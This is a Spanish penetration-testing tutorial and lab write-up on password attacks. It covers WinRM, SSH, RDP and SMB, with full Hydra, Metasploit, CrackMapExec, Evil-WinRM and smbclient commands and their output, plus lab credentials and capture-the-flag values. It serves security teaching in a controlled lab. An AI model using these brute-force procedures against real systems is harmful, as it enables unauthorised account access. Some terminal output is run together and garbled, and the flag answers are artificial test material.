Nota: Este tipo de técnicas son muy invasivas, ya que vamos a conseguir contraseñas de un usuario y acceder a sistemas, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo o en un entorno controlado.
Durante nuestras pruebas de penetración, cada red informática que encontremos tendrá servicios instalados para administrar, editar o crear contenido. Todos estos servicios se alojan mediante permisos específicos y se asignan a usuarios específicos. Además de las aplicaciones web, estos servicios incluyen (pero no se limitan a):
ftp
PYME
NFS
IMAP/POP3
SSH
MySQL/MSSQL
PDR
WinRM
VNC
Telnet
SMTP
LDAP
Para obtener más información sobre muchos de estos servicios, consulte el módulo Enumeración.
Imaginemos que queremos gestionar un servidor Windows a través de la red. En consecuencia, necesitamos un servicio que nos permita acceder al sistema, ejecutar comandos en él o acceder a su contenido a través de una GUI o el terminal. En este caso, los servicios más habituales adecuados para ello son RDP, WinRM, y SSH. SSH ahora es mucho menos común en Windows, pero es el servicio líder para sistemas basados en Linux.
Todos estos servicios cuentan con un mecanismo de autenticación mediante un nombre de usuario y contraseña. Por supuesto, estos servicios se pueden modificar y configurar para que solo se puedan usar claves predefinidas para iniciar sesión, pero en muchos casos están configurados con configuraciones predeterminadas.
Sin embargo, por motivos de seguridad, WinRM debe activarse y configurarse manualmente en Windows 10. Por lo tanto, depende en gran medida de la seguridad del entorno en un dominio o red local donde queramos usar WinRM. En la mayoría de los casos, se utilizan certificados o sólo mecanismos de autenticación específicos para aumentar su seguridad. WinRM utiliza los puertos TCP 5985( HTTP) y 5986( HTTPS).
Una herramienta útil que podemos utilizar para nuestros ataques a contraseñas es CrackMapExec , que también se puede utilizar para otros protocolos como SMB, LDAP, MSSQL y otros. Recomendamos leer la documentación oficial de esta herramienta para familiarizarse con ella.
CrackMapExec
Instalación
Podemos instalar CrackMapExec a través de apt en un host Linux o clonar el repositorio de GitHub y seguir los distintos métodos de instalación , como instalar desde el código fuente y evitar problemas de dependencia.
sudoapt-get-yinstallcrackmapexec
Opciones de menú de CrackMapExec
Al ejecutar la herramienta con la opción -h nos mostrará instrucciones generales de uso y algunas opciones disponibles:
afsh4ck@kali$ crackmapexec -h
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT]
[--jitter INTERVAL] [--darrell]
[--verbose]
{mssql,smb,ssh,winrm} ...
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r using the powah of dank memes
Version: 5.0.2dev
Codename: P3l1as
optional arguments:
-h, --help show this help message and exit
-t THREADS set how many concurrent threads to use (default: 100)
--timeout TIMEOUT max timeout in seconds of each thread (default: None)
--jitter INTERVAL sets a random delay between each connection (default: None)
--darrell give Darrell a hand
--verbose enable verbose output
protocols:
available protocols
{mssql,smb,ssh,winrm}
mssql own stuff using MSSQL
smb own stuff using SMB
ssh own stuff using SSH
winrm own stuff using WINRM
Ayuda específica del protocolo CrackMapExec
Tenga en cuenta que podemos especificar un protocolo específico y recibir un menú de ayuda más detallado de todas las opciones disponibles para nosotros. CrackMapExec actualmente admite la autenticación remota mediante MSSQL, SMB, SSH y WinRM.
La aparición de (Pwn3d!)es la señal de que lo más probable es que podamos ejecutar comandos del sistema si iniciamos sesión con el usuario por fuerza bruta. Otra herramienta útil que podemos utilizar para comunicarnos con el servicio WinRM es Evil-WinRM , que nos permite comunicarnos con el servicio WinRM de manera eficiente.
afsh4ck@kali$ evil-winrm -i 10.129.42.197 -u user -p password
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\user\Documents>
Si el inicio de sesión fue exitoso, se inicializa una sesión de terminal utilizando el protocolo de comunicación remota Powershell ( MS-PSRP), que simplifica la operación y ejecución de comandos.
SSH
Secure Shell ( SSH) es una forma más segura de conectarse a un host remoto para ejecutar comandos del sistema o transferir archivos desde un host a un servidor. Por defecto se ejecuta el servidor SSH TCP port 22, al que podemos conectarnos mediante un cliente SSH. Este servicio utiliza tres operaciones/métodos de criptografía diferentes: symmetriccifrado, asymmetriccifrado y hashing.
Cifrado simétrico
El cifrado simétrico utiliza same keypara cifrar y descifrar. Sin embargo, cualquiera que tenga acceso a la clave también podrá acceder a los datos transmitidos. Por lo tanto, se necesita un procedimiento de intercambio de claves para un cifrado simétrico seguro. Para ello se utiliza el método de intercambio de claves Diffie-Hellman . Si un tercero obtiene la clave, no podrá descifrar los mensajes porque se desconoce el método de intercambio de claves. Sin embargo, el servidor y el cliente lo utilizan para determinar la clave secreta necesaria para acceder a los datos. Se pueden utilizar muchas variantes diferentes del sistema de cifrado simétrico, como AES, Blowfish, 3DES, etc.
Cifrado asimétrico
Usos del cifrado asimétrico two SSH keys: una clave privada y una clave pública. La clave privada debe permanecer secreta porque solo ella puede descifrar los mensajes que han sido cifrados con la clave pública. Si un atacante obtiene la clave privada, que a menudo no está protegida con contraseña, podrá iniciar sesión en el sistema sin credenciales. Una vez que se establece una conexión, el servidor utiliza la clave pública para la inicialización y autenticación. Si el cliente puede descifrar el mensaje, tiene la clave privada y la sesión SSH puede comenzar.
hash
El método hash convierte los datos transmitidos en otro valor único. SSH utiliza hash para confirmar la autenticidad de los mensajes. Este es un algoritmo matemático que solo funciona en una dirección.
Hydra - SSH
Podemos utilizar una herramienta como Hydra de fuerza bruta a SSH. También hay un módulo dedicado específicamente a esta herramienta: Hydra
afsh4ck@kali$ hydra -L user.list -P password.list ssh://10.129.42.197
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found
Para iniciar sesión en el sistema mediante el protocolo SSH, podemos utilizar el cliente OpenSSH, que está disponible por defecto en la mayoría de distribuciones de Linux.
afsh4ck@kali$ ssh user@10.129.42.197
The authenticity of host '10.129.42.197 (10.129.42.197)' can't be established.
ECDSA key fingerprint is SHA256:MEuKMmfGSRuv2Hq+e90MZzhe4lHhwUEo4vWHOUSv7Us.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.42.197' (ECDSA) to the list of known hosts.
user@10.129.42.197's password: ********
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
user@WINSRV C:\Users\user>
Metasploit - SSH Login
afsh4ck@kali$msfconsole-qmsf6>useauxiliary/scanner/ssh/ssh_loginmsf6auxiliary(scanner/ssh/ssh_login) >optionsmsf6auxiliary(scanner/ssh/ssh_login) >optionsModuleoptions (auxiliary/scanner/ssh/ssh_login):NameCurrentSettingRequiredDescription--------------------------------------ANONYMOUS_LOGINfalseyesAttempttologinwithablankusernameandpasswordBLANK_PASSWORDStruenoTryblankpasswordsforallusersBRUTEFORCE_SPEED5yesHowfasttobruteforce,from0to5CreateSessiontruenoCreateanewsessionforeverysuccessfulloginDB_ALL_CREDSfalsenoTryeachuser/passwordcouplestoredinthecurrentdatabaseDB_ALL_PASSfalsenoAddallpasswordsinthecurrentdatabasetothelistDB_ALL_USERSfalsenoAddallusersinthecurrentdatabasetothelist DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, use
r,user&realm)PASSWORDnoAspecificpasswordtoauthenticatewithPASS_FILEpassword.listnoFilecontainingpasswords,oneperline RHOSTS 10.129.250.153 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.htmlRPORT22yesThetargetportSTOP_ON_SUCCESStrueyesStopguessingwhenacredentialworksforahostTHREADS1yesThenumberofconcurrentthreads (max oneperhost)USERNAMEnoAspecificusernametoauthenticateas USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASSfalsenoTrytheusernameasthepasswordforallusersUSER_FILEusernames.listnoFilecontainingusernames,oneperlineVERBOSEtrueyesWhethertoprintoutputforallattemptsmsf6auxiliary(scanner/ssh/ssh_login) >setuser_fileuser.listuser_file =>user.listmsf6auxiliary(scanner/ssh/ssh_login) >setpass_filepassword.listpass_file =>password.listmsf6auxiliary(scanner/ssh/ssh_login) >setrhosts10.129.42.197rhosts =>10.129.42.197msf6auxiliary(scanner/ssh/ssh_login) >setblank_passwordstrueblank_passwords =>truemsf6auxiliary(scanner/ssh/ssh_login) >setstop_on_successtruestop_on_success =>truemsf6auxiliary(scanner/ssh/ssh_login) >setverbosetrueverbose =>truemsf6auxiliary(scanner/ssh/ssh_login) >run[+] 10.129.250.153:22 - 10.129.250.153:22 - Success: '.\user:password'[*] 10.129.250.153:22 - Scanned 1 of 1 hosts (100%complete)[*] Auxiliary module execution completed
RDP - Remote Desktop Protocol
El Protocolo de escritorio remoto de Microsoft ( RDP) es un protocolo de red que permite el acceso remoto a sistemas Windows de forma predeterminada. Trabaja por el puerto TCP 3389. RDP proporciona tanto a los usuarios como a los administradores/personal de soporte acceso remoto a los hosts de Windows dentro de una organización. El protocolo de escritorio remoto define dos participantes en una conexión: un llamado servidor terminal, en el que se realiza el trabajo real, y un cliente terminal, a través del cual se controla remotamente el servidor terminal. Además del intercambio de imágenes, sonido, teclado y dispositivo señalador, el RDP también puede imprimir documentos del servidor terminal en una impresora conectada al cliente terminal o permitir el acceso a los medios de almacenamiento disponibles allí. Técnicamente, RDP es un protocolo de capa de aplicación en la pila de IP y puede utilizar TCP y UDP para la transmisión de datos. El protocolo lo utilizan varias aplicaciones oficiales de Microsoft, pero también se utiliza en algunas soluciones de terceros.
Hydra - RDP
También podemos utilizar Hydra para realizar fuerza bruta a RDP:
afsh4ck@kali$ hydra -L user.list -P password.list rdp://10.129.42.197
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:05:40
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking rdp://10.129.42.197:3389/
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: mrb3n password: rockstar, continuing attacking the account.
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: cry0l1t3 password: delta, continuing attacking the account.
[3389][rdp] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found
Linux ofrece diferentes clientes para comunicarse con el servidor deseado utilizando el protocolo RDP. Estos incluyen Remmina , rdesktop , xfreerdp y muchos otros. Para nuestros propósitos, trabajaremos con xfreerdp.
afsh4ck@kali$ xfreerdp /v:10.129.42.197 /u:user /p:password
...SNIP...
New Certificate details:
Common Name: WINSRV
Subject: CN = WINSRV
Issuer: CN = WINSRV
Thumbprint: cd:91:d0:3e:7f:b7:bb:40:0e:91:45:b0:ab:04:ef:1e:c8:d5:41:42:49:e0:0c:cd:c7:dd:7d:08:1f:7c:fe:eb
Do you trust the above certificate? (Y/T/N) Y
SMB
Server Message Block ( SMB) es un protocolo responsable de transferir datos entre un cliente y un servidor en redes de área local. Se utiliza para implementar servicios de impresión y uso compartido de archivos y directorios en redes Windows. A menudo se hace referencia a SMB como un sistema de archivos, pero no lo es. SMB se puede comparar NFS con Unix y Linux para proporcionar unidades en redes locales.
SMB también se conoce como Sistema de archivos común de Internet ( CIFS). Es parte del protocolo SMB y permite la conexión remota universal de múltiples plataformas como Windows, Linux o macOS. Además, a menudo nos encontraremos con Samba , que es una implementación de código abierto de las funciones anteriores. Para SMB, también podemos usar hydranuevamente para probar diferentes nombres de usuario en combinación con diferentes contraseñas.
Hydra - SMB
afsh4ck@kali$ hydra -L user.list -P password.list smb://10.129.42.197
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-06 19:37:31
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 25 login tries (l:5236/p:4987234), ~25 tries per task
[DATA] attacking smb://10.129.42.197:445/
[445][smb] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid passwords found
Sin embargo, también podemos recibir el siguiente error que describe que el servidor ha enviado una respuesta no válida.
Hydra - Error
afsh4ck@kali$ hydra -L user.list -P password.list smb://10.129.42.197
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-06 19:38:13
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 25 login tries (l:5236/p:4987234), ~25 tries per task
[DATA] attacking smb://10.129.42.197:445/
[ERROR] invalid reply from target smb://10.129.42.197:445/
Esto se debe a que lo más probable es que tengamos una versión desactualizada de THC-Hydra que no puede manejar las respuestas SMBv3. Para solucionar este problema, podemos actualizar y recompilar manualmente hydrao utilizar otra herramienta muy poderosa, el framework Metasploit .
Metasploit - SMB Login
afsh4ck@kali$msfconsole-qmsf6>useauxiliary/scanner/smb/smb_loginmsf6auxiliary(scanner/smb/smb_login) >optionsModuleoptions (auxiliary/scanner/smb/smb_login):NameCurrentSettingRequiredDescription--------------------------------------ABORT_ON_LOCKOUTfalseyesAborttherunwhenanaccountlockoutisdetectedBLANK_PASSWORDSfalsenoTryblankpasswordsforallusersBRUTEFORCE_SPEED5yesHowfasttobruteforce,from0to5DB_ALL_CREDSfalsenoTryeachuser/passwordcouplestoredinthecurrentdatabaseDB_ALL_PASSfalsenoAddallpasswordsinthecurrentdatabasetothelistDB_ALL_USERSfalsenoAddallusersinthecurrentdatabasetothelist DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTHfalsenoEnabledetectionofsystemsacceptinganyauthenticationDETECT_ANY_DOMAINfalsenoDetectifdomainisrequiredforthespecifieduserPASS_FILEnoFilecontainingpasswords,oneperlinePRESERVE_DOMAINStruenoRespectausernamethatcontainsadomainname.ProxiesnoAproxychainofformattype:host:port[,type:host:port][...]RECORD_GUESTfalsenoRecordguest-privilegedrandomloginstothedatabase RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT445yesTheSMBserviceport (TCP)SMBDomain.noTheWindowsdomaintouseforauthenticationSMBPassnoThepasswordforthespecifiedusernameSMBUsernoTheusernametoauthenticateasSTOP_ON_SUCCESSfalseyesStopguessingwhenacredentialworksforahostTHREADS1yesThenumberofconcurrentthreads (max oneperhost) USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASSfalsenoTrytheusernameasthepasswordforallusersUSER_FILEnoFilecontainingusernames,oneperlineVERBOSEtrueyesWhethertoprintoutputforallattemptsmsf6auxiliary(scanner/smb/smb_login) >setuser_fileuser.listuser_file =>user.listmsf6auxiliary(scanner/smb/smb_login) >setpass_filepassword.listpass_file =>password.listmsf6auxiliary(scanner/smb/smb_login) >setrhosts10.129.42.197rhosts =>10.129.42.197msf6auxiliary(scanner/smb/smb_login) >run[+] 10.129.42.197:445 - 10.129.42.197:445 - Success: '.\user:password'[*] 10.129.42.197:445 - Scanned 1 of 1 hosts (100%complete)[*] Auxiliary module execution completed
Ahora podemos usar CrackMapExec para ver los recursos compartidos disponibles y qué privilegios tenemos para ellos.
Para comunicarnos con el servidor vía SMB podemos utilizar, por ejemplo, la herramienta smbclient . Esta herramienta nos permitirá ver el contenido de los recursos compartidos, cargar o descargar archivos si nuestros privilegios lo permiten.
Smbclient
afsh4ck@kali$ smbclient -U user \\\\10.129.42.197\\SHARENAME
Enter WORKGROUP\user's password: *******
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Jan 6 18:48:47 2022
.. DR 0 Thu Jan 6 18:48:47 2022
desktop.ini AHS 282 Thu Jan 6 15:44:52 2022
10328063 blocks of size 4096. 6074274 blocks available
smb: \>
Lab - Password Attacks
Vamos a explotar varios servicios en un host controlado utilizando las técnicas que hemos visto de Password Attacks.
WinRM
Busque el usuario del servicio WinRM y descifre su contraseña. Luego, cuando inicies sesión, encontrarás la flag en el escritorio.
afsh4ck@kali$ evil-winrm -i 10.129.202.136 -u john -p november
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> cd /
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/14/2020 7:11 PM PerfLogs
d-r--- 12/14/2020 6:38 PM Program Files
d----- 2/11/2022 6:10 AM Program Files (x86)
d-r--- 1/6/2022 6:49 AM Users
d----- 12/14/2020 7:11 PM Windows
*Evil-WinRM* PS C:\>
*Evil-WinRM* PS C:\> cd Users*Evil-WinRM* PS C:\Users> dir Directory: C:\UsersMode LastWriteTime Length Name---------------------------d-----12/14/20206:32 PM Administratord-----1/6/20226:44 AM cassied-----1/6/20226:44 AM chrisd-----1/5/20228:14 AM dennisd-----1/6/20226:49 AM jeromed-----1/5/20228:08 AM johnd-r---12/14/20206:32 PM Public
*Evil-WinRM* PS C:\Users> cd john*Evil-WinRM* PS C:\Users\john> dir Directory: C:\Users\johnMode LastWriteTime Length Name---------------------------d-r---1/5/20228:08 AM 3D Objectsd-r---1/5/20228:08 AM Contactsd-r---1/5/20228:11 AM Desktopd-r---1/5/20228:08 AM Documentsd-r---1/5/20228:08 AM Downloadsd-r---1/5/20228:08 AM Favoritesd-r---1/5/20228:08 AM Linksd-r---1/5/20228:08 AM Musicd-r---1/5/20228:08 AM Picturesd-r---1/5/20228:08 AM Saved Gamesd-r---1/5/20228:08 AM Searchesd-r---1/5/20228:08 AM Videos*Evil-WinRM* PS C:\Users\john> cd Desktop*Evil-WinRM* PS C:\Users\john\Desktop> cat flag.txtHTB{That5Novemb3r}
Accedemos correctamente a la flag.txt dentro del escritorio de John 🏆
SSH
Busque el usuario del servicio SSH y descifre su contraseña. Luego, cuando inicies sesión, encontrarás la flag en el escritorio.
hydra-Lusername.list-Ppassword.listssh://10.129.202.136Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-08 09:41:16[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task[DATA] attacking ssh://10.129.202.136:22/[STATUS] 156.00 tries/min, 156 tries in 00:01h, 20958 to do in 02:15h, 14 active[22][ssh] host: 10.129.202.136 login: dennis password: rockstar
sshdennis@10.129.202.136dennis@10.129.202.136's password: rockstar(c) 2018 Microsoft Corporation. All rights reserved.dennis@WINSRV C:\Users\dennis>dir Volume in drive C has no label. Volume Serial Number is 2683-3D37 Directory of C:\Users\dennis01/05/2022 08:14 AM <DIR> .01/05/2022 08:14 AM <DIR> ..01/05/2022 08:14 AM <DIR> 3D Objects 01/05/2022 08:14 AM <DIR> Contacts 01/05/2022 08:16 AM <DIR> Desktop 01/05/2022 08:14 AM <DIR> Documents 01/05/2022 08:14 AM <DIR> Downloads 01/05/2022 08:14 AM <DIR> Favorites 01/05/2022 08:14 AM <DIR> Links 01/05/2022 08:14 AM <DIR> Music 01/05/2022 08:14 AM <DIR> Pictures 01/05/2022 08:14 AM <DIR> Saved Games 01/05/2022 08:14 AM <DIR> Searches 01/05/2022 08:14 AM <DIR> Videos 0 File(s) 0 bytes 14 Dir(s) 26,291,662,848 bytes free dennis@WINSRV C:\Users\dennis>cd Desktop dennis@WINSRV C:\Users\dennis\Desktop>dir Volume in drive C has no label. Volume Serial Number is 2683-3D37 Directory of C:\Users\dennis\Desktop01/05/2022 08:16 AM <DIR> .01/05/2022 08:16 AM <DIR> ..01/05/2022 08:39 AM 15 flag.txt 1 File(s) 15 bytes 2 Dir(s) 26,293,751,808 bytes free dennis@WINSRV C:\Users\dennis\Desktop>type flag.txt HTB{Let5R0ck1t}
Accedemos correctamente a la flag.txt dentro del escritorio de Dennis 🏆
RDP
Encuentre el usuario del servicio RDP y descifre su contraseña. Luego, cuando inicies sesión, encontrarás la flag en el escritorio.
Hydra
hydra-Lusername.list-Ppassword.listrdp://10.129.202.136Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-08 13:54:35[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdpdoesnotlikemanyparallelconnections)[WARNING] the rdp module is experimental. Please test, report - and ifpossible,fix.[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 21112 login tries (l:104/p:203), ~5278 tries per task[DATA] attacking rdp://10.129.202.136:3389/[3389][rdp] account on 10.129.202.136 might be valid but account not active for remote desktop: login: john password: november, continuing attacking the account.
[3389][rdp] account on 10.129.202.136 might be valid but account not active for remote desktop: login: dennis password: rockstar, continuing attacking the account.
[3389][rdp] host: 10.129.202.136 login: chris password: 789456123 |----------------------------------|
Xfreerdp
xfreerdp /v:10.129.202.136 /u:chris /p:789456123
Accedemos correctamente a la flag.txt dentro del escritorio de Chris 🏆
SMB
Encuentre el usuario del servicio RDP y descifre su contraseña. Luego, cuando inicies sesión, encontrarás la flag en el escritorio.
afsh4ck@kali$ smbclient -U cassie \\\\10.129.202.136\\CASSIE
Password for [WORKGROUP\cassie]: 12345678910
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Mar 8 14:28:18 2024
.. DR 0 Fri Mar 8 14:28:18 2024
desktop.ini AHS 282 Thu Jan 6 15:44:52 2022
flag.txt A 16 Thu Jan 6 15:46:14 2022
10328063 blocks of size 4096. 6416431 blocks available
smb: \> get flag.txt
getting file \flag.txt of size 16 as flag.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
